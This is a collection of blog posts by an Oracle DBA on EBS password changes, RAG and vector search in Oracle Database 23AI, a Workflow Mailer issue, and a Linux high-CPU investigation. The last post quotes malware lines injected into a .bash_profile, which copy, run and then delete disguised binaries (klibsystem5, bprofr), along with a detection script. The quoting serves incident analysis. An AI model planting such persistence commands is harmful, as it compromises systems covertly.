Wednesday, March 5, 2025

EBS 12.2 -- Password Change / Special Characters / FNDCPASS and all that.

If you change the APPS password to a value containing special characters in the wrong way, you may encounter "ORA-01017: invalid username/password; logon denied" errors in almost anything that touches the EBS database.

Here is an example thread in my forum : http://erman-arslan-s-oracle-forum.124.s1.nabble.com/db-connection-error-after-APPS-password-change-td12919.html

Note that using the FNDCPASS utility to change the passwords of database users such as APPS, APPLSYS, GL, etc. to values that include special characters is NOT supported. I haven't tried it, but I think the same goes for AFPASSWD (the enhanced version of FNDCPASS).

However, you may use FNDCPASS to change an application user's password (such as SYSADMIN's password) to a value with special characters. If you want to do that, you may need to enclose the password in quotation marks.

Here is an example:

FNDCPASS apps/apps 0 Y system/manager USER SYSADMIN '$welcome1'

Note that for some special characters you don't need quotation marks. This is by design.

Check the MOS note below for the special characters supported in application user passwords and for when quotation marks are required with FNDCPASS.

R12: How to change passwords to include special characters using FNDCPASS? (Doc ID 1336479.1)
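One likely reason the quotation marks matter is the shell itself: without single quotes, a shell would try to expand $welcome1 as a variable before FNDCPASS ever sees it. Here is a minimal sketch of that idea. Python is used only for illustration, the build_fndcpass_command helper is hypothetical, and the credentials are the sample values from the example above. The MOS note remains the authority on which characters are supported.

```python
import shlex

def build_fndcpass_command(apps_cred, system_cred, app_user, new_password):
    """Return a shell-safe FNDCPASS command line for an application user (USER mode)."""
    args = ["FNDCPASS", apps_cred, "0", "Y", system_cred, "USER", app_user, new_password]
    # shlex.quote adds single quotes only when an argument contains
    # characters that a POSIX shell would otherwise interpret (such as $).
    return " ".join(shlex.quote(arg) for arg in args)

# Hypothetical helper call using the sample values from the post.
command = build_fndcpass_command("apps/apps", "system/manager", "SYSADMIN", "$welcome1")
print(command)
```

Only the password gets quoted here, because it is the only argument containing a character the shell treats specially.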

Friday, February 28, 2025

GTech, Oracle Event - Oracle Database 23AI and OEM 24AI

I have spoken at so many events that I have lost count, but this one was so much fun.

I explained the unification of AI (vectors, and DB-integrated GEN AI with RAG), Graph and native JSON in the context of the converged Oracle Database. I presented key new features of Oracle Database 23AI and did a demo of a RAG solution that we developed in-house using Oracle Database 23AI, OCI's integrated GEN AI models and Cohere's GEN AI models.

We also talked about the AI-powered features of the new Oracle EM. It was fun and it was beneficial to the community. We eagerly await the 23AI upgrades in the near future.

A formal intro for my speech was as follows: 

GTech Senior System and Database Management Director, Oracle ACE Pro♠️ Erman Arslan explained how our infrastructure and system services enhance database performance, security, and resilience, while showcasing the next-generation speed and efficiency solutions offered by Oracle Database 23AI with AI.


My Podcast: Ayna Düşünceler (Mirror thoughts) available on Spotify

A result of curiosity, passion and research. Occasional audio representations of my blog posts. 

I share interesting thoughts in the fields of Physics, Philosophy and Computer Science, what I have learned from academic studies and my own experiences and intellectual gymnastics. 

This will be a series of talks that are close to popular science but also try to go deep from time to time. 

I do not aim to make income or profit from this series; I talk about topics that I think interested listeners will like.

These are topics that I can say interesting things about. I hope you will like it. It is available on Spotify, and it is in Turkish at the moment.


The following video was recorded as a memory. Currently I'm very busy with my day job, but I may have a YouTube channel one day, who knows :)


Monday, December 16, 2024

Building a Retrieval-Augmented Generation (RAG) System with Oracle Database 23AI, OCI and LLM(s): Powering Up Information Retrieval with AI

Greetings, database enthusiasts! Today, we're diving into the exciting world of Retrieval-Augmented Generation (RAG) systems. Here I am, blogging again, this time motivated by the vector capabilities of Oracle Database 23AI, which we leveraged while building ourselves a Sales Assistant. Alongside Oracle 23AI, we used OCI's and Cohere's large language models (and integrations), and Flask, to build our solution. This AI-based Sales Assistant is in beta, but with a little more effort we can make it production ready.

Basically, our sales assistant takes questions from the user and provides answers by using the LLMs in the backend. However, the answers generated by the LLMs are always kept in context, and this is done with the help of RAG (and some orchestration done via our Python code).

The value here is that we used Oracle Database 23AI as our vector store, so we didn't need to position a separate database for storing vector embeddings and doing vector similarity searches.

You can extrapolate that and think of what you can do with these types of new features of Oracle Database 23AI.

Anyway, what about RAG?

Imagine a system that can not only find relevant information but also craft insightful answers based on that knowledge. That's the essence of RAG. It takes information retrieval a step further by using generative models to create comprehensive responses to user queries.

Our Project: 

In this project, we created a custom RAG system that leverages three key players:

Oracle 23AI: The new version of Oracle Database acts as our knowledge repository, storing documents and their corresponding vector embeddings (think of them as condensed representations capturing the document's meaning).

Cohere: We'll tap into Cohere's arsenal of LLMs, like command-r-plus, for answer generation. These models are masters at weaving words into coherent and informative responses.

Flask: This lightweight web framework serves as the user interface, allowing users to interact with our system and receive answers to their questions.

The Deep Dive: How It Works

Query Embeddings: When a user asks a question, the system transforms it into an embedding using Cohere. This embedding becomes the key to unlocking relevant information.

Knowledge Retrieval: The system dives into the Oracle 23AI database, wielding the power of vector similarity search. It compares the query embedding with stored document embeddings to identify the most relevant documents – think of it as finding the closest matches in the knowledge vault.

Refining the Results: Not all retrieved documents are created equal. We utilize Cohere's reranking model to sort these documents by their true relevance to the user's query, ensuring the most pertinent ones are at the forefront.

Answer Generation: Now comes the magic! Cohere's LLM takes center stage. It analyzes the query and the top-ranked documents, crafting a comprehensive answer that incorporates both the user's intent and the relevant retrieved information. 

Serving Up the Answer: Finally, the user receives the answer, along with the most relevant documents to provide context and transparency.
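To make the flow above more concrete, here is a minimal, self-contained sketch of the same steps. It is not our project code: the toy bag-of-words embed function stands in for Cohere's embedding model, the in-memory list stands in for the Oracle 23AI vector store, the rerank function is a simple word-overlap stand-in for Cohere's reranker, and the final prompt is only printed instead of being sent to an LLM. All function names and sample documents are hypothetical.

```python
import math
from collections import Counter

def embed(text):
    """Toy bag-of-words embedding; a stand-in for a real embedding model."""
    return Counter(text.lower().split())

def cosine_similarity(a, b):
    """Cosine similarity between two sparse word-count vectors."""
    dot = sum(a[term] * b[term] for term in a)
    norm = math.sqrt(sum(v * v for v in a.values())) * math.sqrt(sum(v * v for v in b.values()))
    return dot / norm if norm else 0.0

def retrieve(query, documents, k=3):
    """Embed the query and return the k most similar documents."""
    query_vector = embed(query)
    ranked = sorted(documents, key=lambda doc: cosine_similarity(query_vector, embed(doc)), reverse=True)
    return ranked[:k]

def rerank(query, candidates):
    """Stand-in reranker: prefer documents that share more terms with the query."""
    terms = set(query.lower().split())
    return sorted(candidates, key=lambda doc: len(terms & set(doc.lower().split())), reverse=True)

def build_prompt(query, context_docs):
    """Assemble the grounded prompt that would be sent to the LLM."""
    context = "\n".join(f"- {doc}" for doc in context_docs)
    return f"Answer using only this context:\n{context}\n\nQuestion: {query}"

# Hypothetical knowledge base and question.
documents = [
    "the premium plan includes 24x7 support",
    "the basic plan includes email support only",
    "our office is closed on public holidays",
]
question = "which plan includes 24x7 support"
top_docs = rerank(question, retrieve(question, documents, k=2))
prompt = build_prompt(question, top_docs)
print(prompt)
```

In a real system, the retrieve step would be a vector similarity query against the database, and the prompt would be passed to the generation model together with the user's question.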

Why Oracle 23AI?

Here's why Oracle 23AI is the perfect partner for our RAG system:

Vector Powerhouse: Its vector datatype enables efficient storage, indexing, and retrieval of document embeddings, crucial for speedy searches.

Scalability: As our system grows, Oracle 23AI can handle the increasing volume of data with ease.

A Word on Overcoming Challenges

During our project, we encountered a minor problem: the Frankfurt region on Oracle Cloud Infrastructure (OCI) didn't support the specific Cohere model we needed. (Note that for some parts of the work we reached the LLMs through OCI and its service integrations, and for other parts, like text generation, we reached them directly from our code.) So, we switched to the Chicago region, which provided seamless integration. Just a reminder: sometimes a quick regional shift can save the day!

The Future of RAG: A World of Possibilities

RAG systems hold immense potential to revolutionize information retrieval. By combining retrieval-based approaches with generative models, we can create systems that understand user intent, provide comprehensive answers, and constantly learn and improve.

Ready to Build Your Own RAG System?

This blog post serves as a springboard for your RAG exploration. With the power of Oracle 23AI, Cohere, and Flask, you can create a system that empowers users to unlock the true potential of information. Stay tuned for future posts where we delve deeper into the code and implementation details!

As always, feel free to leave any questions or comments below. 

Wednesday, December 4, 2024

Exploring the limitations of classical computing and the types of business problems Quantum is best suited for.

By studying Quantum Business Foundations, I revisited (and updated) the relevant part of my knowledge base, which covers the limitations of classical computing and the types of business problems quantum is best suited for (including the answer to the question of why).

This was for identifying the implications of the paradigm shift brought about by quantum for business strategy, technology and the operating model.

Friday, November 29, 2024

Diving practically into Quantum-Safe Cryptography

Let's protect our confidential information and our secrets with mechanisms and algorithms that are computationally difficult to break. Think ahead and make your crypto system ready for the future. Post-Quantum Cryptography it is. Be quantum-proof, quantum-safe, quantum-resistant.

Enough of the passionate intro :) I received my second certificate in IBM quantum and I am sharing it here. More to come :)

This was for being able to understand the foundations of cryptography, how the cybersecurity risk landscape is evolving in the quantum era, and how to protect against such threats through the use of new encryption algorithms.

Tuesday, June 11, 2024

EBS 12.2 -- Wf Mailer ( Mail Status SENT but No Email Delivered + Email From Section cannot be set to desired email address)


EBS Workflow Mailer: A Tale of Two Mysteries

Alright folks, buckle up for some classic EBS weirdness! This one involves the Workflow Notification Mailer in a fresh Oracle EBS 12.2.11 project. We got it all configured, tested it – IMAP, SMTP, everything seemed okay. But then, like a magic trick gone wrong, emails stopped flowing. 

The customer's mail admin checked the server logs, but saw nothing. Their words? "Your mailer taps the SMTP server on the shoulder, then just walks away. No emails, no nothin'." We chased network packets, analyzed traces – same story. The mailer wasn't even attempting to send anything. No errors,  just a complete disregard for its duties.

Telnet tests? Perfect. Workflow mail status? "SENT". We tried everything: disabling TLS/SSL, using relays. Nothing worked. Finally, in a moment of desperation, we cleared the functional admin cache and restarted the mailer. And bam! Emails started flowing again.

We suspect a wrong configuration value got stuck in the cache during all our testing. Maybe a change, not even directly related to the mailer, messed with some underlying setting it relies on (a sneaky delivery preference, perhaps?). Whatever it was, clearing the cache did the trick.

But wait, there's more! The emails sent by the mailer had a strange "From" address, in the format of "<Workflow SMTP account/username>". We tried everything on the mailer side to change it, but nothing helped. Turns out, the mail server itself was missing a crucial piece: the display name setting. Without it, the server's default configuration for the From field was apparently overriding the workflow mailer's settings.

So, the customer added a display name – "WF Mailer PROD EBS 12.2" (exactly what we wanted!) – on the mail server. And mystery number two solved.

Moral of the story? EBS can be a box of chocolates. You never know what you're gonna get. But hey, at least we got the mail flowing and the "From" address looking as we wanted. Now, if you'll excuse me, I need a strong cup of coffee to recover from that rollercoaster ride :)

Tuesday, June 4, 2024

Converged Database - Oracle Database 23AI Vector Search - Combine traditional search on business data with AI vector powered similarity search.

 

Oracle Database 23AI Vector Search: A Game Changer for Enterprise Search

Hey everyone, Erman Arslan here. Today, I'm diving into a revolutionary new feature in Oracle Database 23AI: Vector Search. This technology promises to completely transform how you search for information, especially within your enterprise data.

Understanding Semantics Through Vectors

Imagine searching for data based on meaning, not just keywords. That's the power of Vector Search. It uses machine learning embedding models, like ResNet for images and BERT for text, to convert your data into vectors. These vectors represent the semantic essence of your information. Similar entities will have vectors close together in this multidimensional space.
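As a small illustration of "close together", here is a sketch that computes the cosine distance between a few made-up vectors. The three-dimensional embeddings below are hypothetical values chosen by hand (real embedding models produce vectors with hundreds or thousands of dimensions), and cosine is only one of the possible distance metrics.

```python
import math

def cosine_distance(u, v):
    """Cosine distance: 0 means same direction, values near 1 mean unrelated."""
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    return 1.0 - dot / (norm_u * norm_v)

# Hypothetical hand-made embeddings, for illustration only.
embeddings = {
    "invoice": [0.9, 0.1, 0.0],
    "bill": [0.8, 0.2, 0.1],
    "holiday": [0.0, 0.2, 0.9],
}

query = embeddings["invoice"]
for word, vector in embeddings.items():
    print(word, round(cosine_distance(query, vector), 3))
```

With these values, "bill" ends up much closer to "invoice" than "holiday" does, which is the behaviour a semantic search relies on.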

The Power of Combining Traditional and AI-powered Search

The beauty of Oracle Database 23AI is that it seamlessly integrates traditional search with AI-powered vector similarity search. This eliminates the need to deploy a separate vector database, which can lead to data staleness, increased complexity, hard-to-maintain consistency, and security risks.

23AI: The Enterprise-grade Advantage

Here's where Oracle shines. Oracle Database 23AI is a converged platform that eliminates the complexities of managing separate systems. It also tackles a major challenge of Large Language Models (LLMs): hallucination. By combining LLM knowledge with relevant results from vector searches, 23AI helps produce more accurate and reliable responses.

LLM + AI Vector Search: A Powerful Knowledge Base

Imagine this: you have a vast knowledge base that combines real-time enterprise data with a broad range of information from the internet. That's the magic of LLM and AI Vector Search working together. Users submit queries, which are encoded as vectors and searched against the database. The closest matches are then fed to the LLM, empowering it to deliver comprehensive and informative responses.

In other words, "LLM + AI Vector Search" means a broad range of data from the internet (a snapshot from a point in time) plus private enterprise business data, with the knowledge base updated in real time.

Unveiling the New SQL for Vector Power

23AI introduces a range of new SQL features to unleash the power of vector searches:

  • New SQL for Vector Generation: Easily generate vectors from your data.
  • New Vector Data Type: Store vector embeddings efficiently using the new VECTOR data type.
  • New Vector Search Syntax: Perform efficient similarity searches with the VECTOR_DISTANCE function and optional distance metrics.
  • New Approximate Search Indexes: Achieve high performance with approximate search indexes for large datasets.
  • New PL/SQL Packages and Integrations: Extend the functionality with PL/SQL packages and integrate with third-party frameworks for building robust AI pipelines.

Crafting Powerful Vector Search Queries

Here's an example query that demonstrates the power of vector search:

SQL

SELECT ...
FROM JOB_Postings
WHERE city IN (SELECT PREFERRED_CITIES FROM Applications...)
ORDER BY vector_distance(job_desc_vectors, :resume_vector)
FETCH APPROXIMATE FIRST 10 ROWS ONLY WITH TARGET ACCURACY 90;

This query returns the ten job postings, restricted to the candidate's preferred cities, whose job descriptions are most similar to the provided resume vector.
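To show what the query above computes, here is a minimal sketch of the same logic in plain Python: a relational filter on the city, an ordering by vector distance, and a row limit. This is an exact, brute-force version for illustration only (the APPROXIMATE clause lets the database use a vector index instead). The rows, the two-dimensional vectors and the use of Euclidean distance are all assumptions made for brevity.

```python
import math

# Hypothetical rows: (job_id, city, job_desc_vector)
job_postings = [
    (1, "Istanbul", [0.9, 0.1]),
    (2, "Ankara", [0.8, 0.2]),
    (3, "Istanbul", [0.1, 0.9]),
    (4, "Izmir", [0.85, 0.15]),
]
preferred_cities = {"Istanbul", "Izmir"}
resume_vector = [0.88, 0.12]

def top_matches(rows, cities, query_vector, limit):
    """Filter on business data first, then order by vector distance, then keep `limit` rows."""
    filtered = [row for row in rows if row[1] in cities]
    filtered.sort(key=lambda row: math.dist(row[2], query_vector))
    return [row[0] for row in filtered[:limit]]

print(top_matches(job_postings, preferred_cities, resume_vector, limit=2))
```

Job 2 has a similar vector but is filtered out by the city condition, which is the point of combining traditional predicates with similarity search in one statement.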

Choosing the Right Vector Index

23AI offers two types of vector indexes for optimal performance:

  • Graph Vector Index: In-memory index for fast and highly accurate searches on smaller datasets.
  • Neighbor Partition Vector Index: Scalable index for massive datasets that can't fit in memory. It delivers fast results with a high chance of finding relevant matches.
Here is an example of the index creation syntax:

DDL

CREATE VECTOR INDEX photo_idx ON Customer(photo_vector)
ORGANIZATION [INMEMORY NEIGHBOR GRAPH | NEIGHBOR PARTITIONS]
DISTANCE COSINE | EUCLIDEAN | MANHATTAN | ...
WITH TARGET ACCURACY 90 -- here we can specify the target accuracy

Note that we use the APPROXIMATE keyword to tell the optimizer to use the relevant vector index. Even if we specify it, Oracle's cost-based optimizer can still do an exact search if it finds the index access too costly. Example: FETCH APPROXIMATE FIRST 5 ROWS ONLY.

The Importance of Enterprise-grade CBO

Optimizing vector search queries, especially when combined with normalized enterprise data, requires an enterprise-grade Cost-Based Optimizer (CBO). 23AI delivers on this front, unlike purpose-built vector databases that lack this crucial functionality.

Beyond Single Vectors: Multi-Vector Queries

23AI empowers you to perform multi-vector queries, allowing you to search based on a combination of different vectors.

Key Differentiators: Why Choose Oracle Database 23AI

  • Transactional Consistency: Neighbor Partition Vector Indexes guarantee transactional consistency, making them ideal for high-speed, consistent operations.
  • Scale-out Architecture: Distribute vector search workloads across RAC nodes for exceptional scalability.
  • Exadata Offloading: Offload vector search tasks to Exadata Storage for even greater performance.
  • Seamless Integration: Oracle Sharding, parallel execution, partitioning, security and more all work seamlessly with AI Vector Search.

AI Vector Search: The Engine of GEN AI Pipelines

23AI goes beyond search. It serves as the foundation for powerful GEN AI Pipelines. These pipelines seamlessly integrate document loading, transformation, embedding models, vector search, and LLM reasoning – all within the robust Oracle Database 23AI platform.

This is just a glimpse into the exciting world of Oracle Database 23AI Vector Search. Stay tuned for future posts where we'll delve deeper into specific use cases and explore the key features (like True Cache and Distributed-Database related enhancements...) of the new Oracle Database Release.

Friday, May 31, 2024

Erman Arslan's Oracle Forum / APR 23 - MAY 31, 2024 - "Q & A Series"

Empower yourself with knowledge! Erman Arslan's Oracle Blog offers a vibrant forum where you can tap into a wealth of experience. Get expert guidance and connect with a supportive community. Click the banner proclaiming "Erman Arslan's Oracle Forum is available now!" Dive into the conversation and ask your burning questions.

Or just use the direct link: http://erman-arslan-s-oracle-forum.124.s1.nabble.com

A testament to its vibrancy: over 2,000 questions have been posed, sparking nearly 10,000 insightful comments. Explore the latest discussions and see what valuable knowledge awaits!



Supporting Oracle users around the world. Let's check what we have had in the last few weeks.

Tuesday, May 14, 2024

Linux -- Decoding the High CPU Usage Mystery: A Bash Shell Odyssey / Autogenerating bash process - Malware - klibsystem5 & bprofr

 

Decoding the High CPU Usage Mystery: A Bash Shell Odyssey


This blog post details the investigation of a high CPU usage issue caused by a rogue bash process on an Oracle Linux server. This systematic investigation identified malicious scripts causing the high CPU usage. This blog post also offers valuable insights into troubleshooting bash process issues and highlights the importance of secure system configurations. 

Note that this is based on a real story (an issue reported to me through my forum, Erman Arslan's Oracle Forum).

The Case:

The customer encountered a bash process consuming 98% CPU. Killing it brought only temporary relief, as it restarted automatically.

The Investigation Begins:

I requested more information to understand the process's behavior. The customer provided the top command output, which showed the bash process with high CPU usage.

Digging Deeper:

I suggested using ps with the -elf flags to get detailed process information. This revealed that the bash process was in the sleeping state (S). Analyzing the /proc/8879/cmdline file confirmed it was a bash shell, but the process seemed inactive. Note that 8879 was the PID of the process.

Next, I requested the output of w to see logged-in users and processes. This helped rule out user interaction as the cause.

Process Examination:

I instructed the customer to examine the bash process's working directory (/proc/8879/cwd) and open file descriptors (cd /proc/8879/fd/; ls -la). This revealed that the process had file descriptors related to appsdev, a development OS user, and seemed to be waiting for an event (eventpoll).

Background info:

An unknown process that shows up as -bash: This process might be a child process spawned by the bash shell itself, or another system service running in the background.

4 -> anon_inode:[eventpoll]: This indicates the process is using an event poll mechanism to monitor events from various sources.
9 -> anon_inode:[eventfd]: This suggests the process might be using an eventfd for efficient inter-process communication or signaling.

It is probably an OS process; probably the OS or a daemon starts it. It may belong to a monitoring process such as systemd-monitor.

*Use ps -ef or pstree to get a detailed listing of running processes. Look for processes whose parent process ID (PPID) matches the PID of the bash process.

Stracing the System Call:

I analyzed the output of strace on the process. This confirmed the bash process was stuck in the epoll_pwait system call, waiting for events from an epoll instance. The repeated calls with timeouts suggested it wasn't receiving expected events. Here's how to interpret the output and troubleshoot further:

epoll_pwait: This system call waits for events on an epoll instance. It's a mechanism for efficient I/O waiting in applications.

The arguments to epoll_pwait specify the epoll instance, a buffer for the returned events, the maximum number of events to return, a timeout in milliseconds, and a signal mask.

Analysis of strace Output:

The process repeatedly calls epoll_pwait with a timeout (values like 182, 220, etc.).

Between calls, it uses clock_gettime to get the current time. This suggests the process isn't receiving expected events and keeps waiting with timeouts.
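The pattern in the trace (wait with a timeout, get nothing, check the clock, wait again) can be reproduced with a small sketch. This is only an illustration of the pattern, not the malware's code. Python's selectors module is used as a stand-in; on Linux it is backed by epoll, though the exact system call it issues may differ from the epoll_pwait seen in the trace. The pipe, the function name and the short timeouts are assumptions for the demo.

```python
import os
import selectors
import time

def wait_for_events(timeouts_ms):
    """Repeatedly wait on a descriptor that never becomes readable."""
    read_fd, write_fd = os.pipe()  # nothing is ever written to this pipe
    selector = selectors.DefaultSelector()  # epoll-based on Linux
    selector.register(read_fd, selectors.EVENT_READ)
    results = []
    try:
        for timeout_ms in timeouts_ms:
            started = time.monotonic()  # comparable to the clock_gettime calls
            events = selector.select(timeout=timeout_ms / 1000)
            elapsed_ms = (time.monotonic() - started) * 1000
            # Record how many events arrived and how long the wait took.
            results.append((len(events), round(elapsed_ms)))
    finally:
        selector.close()
        os.close(read_fd)
        os.close(write_fd)
    return results

results = wait_for_events([20, 30])
print(results)
```

Each wait returns zero events after roughly its timeout, which is the same shape as the repeated epoll_pwait calls in the strace output.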

Further investigation suggested:

  • Check cron jobs and systemd services for any entries that might be starting the bash process.
  • Review system logs (/var/log/messages and dmesg) for any errors related to the process.
  • Investigate the script's purpose: if the script is legitimate, investigate its purpose and modify it to avoid excessive I/O calls and resource usage.
  • Debug Bash Processes (Cautionary Approach): I warned about the risks of enabling debug for all bash processes. This is a complex approach and should only be attempted with a thorough understanding of the potential consequences.
  • Suggested commands for getting information on the context:
    • pstree
    • cat /proc/<pid>/cmdline
    • readlink /proc/<pid>/cwd
    • cd /proc/<pid>/fd; ls -al
    • ls -l /proc/<pid>/cwd
    • strace -p <pid>
    • lsof -p <pid>
    • crontab -l
    • systemd services with systemctl list-unit-files and systemctl status <service_name>.
    • cat .bash_profile (the customer discovered this one with the help of the suggestions)
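Several of the /proc checks listed above can be collected in one go. Here is a minimal sketch, assuming a Linux system with /proc mounted and enough privileges to read the target process's entries. The inspect_process function name and the returned dictionary layout are hypothetical; the sketch inspects its own PID just to have something safe to run.

```python
import os

def inspect_process(pid):
    """Collect the same /proc details as the manual commands (Linux only)."""
    base = f"/proc/{pid}"
    info = {"pid": pid, "cmdline": None, "cwd": None, "fds": {}}
    try:
        with open(f"{base}/cmdline", "rb") as handle:
            # Arguments are NUL-separated in /proc/<pid>/cmdline.
            raw = handle.read().replace(b"\0", b" ")
            info["cmdline"] = raw.decode(errors="replace").strip()
        info["cwd"] = os.readlink(f"{base}/cwd")
        for fd in os.listdir(f"{base}/fd"):
            try:
                # Each entry is a symlink to a file, socket or anon_inode.
                info["fds"][fd] = os.readlink(f"{base}/fd/{fd}")
            except OSError:
                pass  # the descriptor was closed while we were listing
    except OSError as error:
        info["error"] = str(error)  # no /proc, no such PID, or no permission
    return info

report = inspect_process(os.getpid())
print(report)
```

For a suspicious process, entries such as anon_inode:[eventpoll] in the fds mapping correspond to what the ls -al on the fd directory showed in this case.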

The Culprit Revealed:

With the provided guidance, the customer discovered a suspicious entry in his .bash_profile that was designed to automatically copy and execute a script (/tmp/-bash). This script appeared to be scanning for open ports (80, 443, etc.). This explained the eventpoll descriptor and the process waiting for I/O.

--
I can see, there is an entry made in .bash_profile by automatically. please see below:
cp -f -r -- /bin/klibsystem5 2>/dev/null && /bin/klibsystem5 >/dev/null 2>&1 && rm -rf -- /bin/klibsystem5 2>/dev/null
cp -f -r -- /tmp/.pwn/bprofr /tmp/-bash 2>/dev/null && /tmp/-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- /tmp/-bash 2>/dev/null

--

*The system was affected by klibsystem5 and bprofr. Both were malware.
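A quick way to look for this kind of injected entry on other accounts is to scan the shell profile files for similar patterns. The sketch below is only a heuristic based on the bprofr line reported above. The pattern names, the regular expressions and the scan_profile function are assumptions for illustration, not a malware signature set, and a clean result does not prove that a system is clean.

```python
import re

# Heuristic patterns derived from the injected line; assumptions, not signatures.
SUSPICIOUS_PATTERNS = {
    "copy-run-delete chain": re.compile(r"\bcp\b.*&&.*&&\s*rm\b"),
    "path under /tmp": re.compile(r"(^|\s)/tmp/\S+"),
    "output silenced": re.compile(r">\s*/dev/null\s+2>&1"),
}

def scan_profile(text):
    """Return (line_number, matched_reasons) for every line that looks suspicious."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        reasons = [name for name, pattern in SUSPICIOUS_PATTERNS.items() if pattern.search(line)]
        if reasons:
            findings.append((number, reasons))
    return findings

# Sample content: one harmless line plus the bprofr entry quoted in the post.
sample_profile = """export PATH=$PATH:$HOME/bin
cp -f -r -- /tmp/.pwn/bprofr /tmp/-bash 2>/dev/null && /tmp/-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- /tmp/-bash 2>/dev/null
"""
findings = scan_profile(sample_profile)
print(findings)
```

In practice the text would come from files such as .bash_profile or .bashrc of each OS user, read with the appropriate privileges.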

Suggestions for the fix:

  • Manual removal of the malware (klibsystem5 and bprofr): find their source files and the affected system files, then delete them one by one (or clean them, in the case of system files).
  • Migrating the affected applications / databases to a new server. This might be the better option if we can't be sure that the malware has been removed completely. But if we migrate, there is a risk of migrating the malware too, so careful and delicate work is required.